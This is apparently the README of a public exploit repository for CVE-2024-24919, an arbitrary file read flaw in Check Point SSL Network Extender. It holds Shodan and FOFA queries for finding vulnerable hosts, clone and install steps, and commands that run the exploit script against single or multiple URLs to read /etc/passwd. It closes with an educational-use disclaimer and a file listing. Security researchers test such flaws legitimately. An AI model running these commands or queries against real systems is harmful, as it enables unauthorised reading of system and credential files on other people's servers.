# CVE-2024-24919 Exploit
**CVE Identifier:** CVE-2024-24919
**Vulnerability Type:** Local File Inclusion (LFI)
**Severity:** High
**CVSS Score:** 7.5 (High)
# Overview:
CVE-2024-24919 is a Local File Inclusion (LFI) vulnerability present in certain web applications.
This vulnerability allows an attacker to read files from the server by manipulating the file path input parameter.
By exploiting this flaw, an attacker can gain access to sensitive files on the server, such as configuration files, password files, and other critical data, leading to information disclosure and potential further compromise.
# Affected Software:
Check Point SSL Network Extender
# Queries to find vulnrable hosts
1. Shodan
"Server: Check Point SVN"
2. fofa
title=="Check Point SSL Network Extender"
# Usage
intall exploit
`git clone https://github.com/gurudattch/CVE-2024-24919`
install requirements
`pip install -r requirments.txt`
Check a Single URL
To check a single URL for the vulnerability:
`python cve-2024-24919.py -u "http://example.com" -d "/etc/passwd"`
Check Multiple URLs from a File
`python cve-2024-24919.py -f "urls.txt" -d "/etc/passwd"`
Arguments
```
options:
-h, --help show this help message and exit
-u URL, --url URL Single URL to check for vulnerability
-f FILE, --file FILE File containing multiple URLs to check
-d DATA, --data DATA Data to send in the request (eg. /etc/passwd)
-r {y,n}, --response {y,n} Print Response Or Not
```
# Disclaimer
This script is intended for educational purposes and should only be used to test systems you own or have permission to test. Unauthorized use of this script against systems without permission is illegal.
[4.0K] /data/pocs/4cfe5dff6e3096e4dca82164ba49c6a50d461140
├── [3.2K] cve-2024-24919.py
├── [1.7K] README.md
└── [ 69] requirements.txt
0 directories, 3 files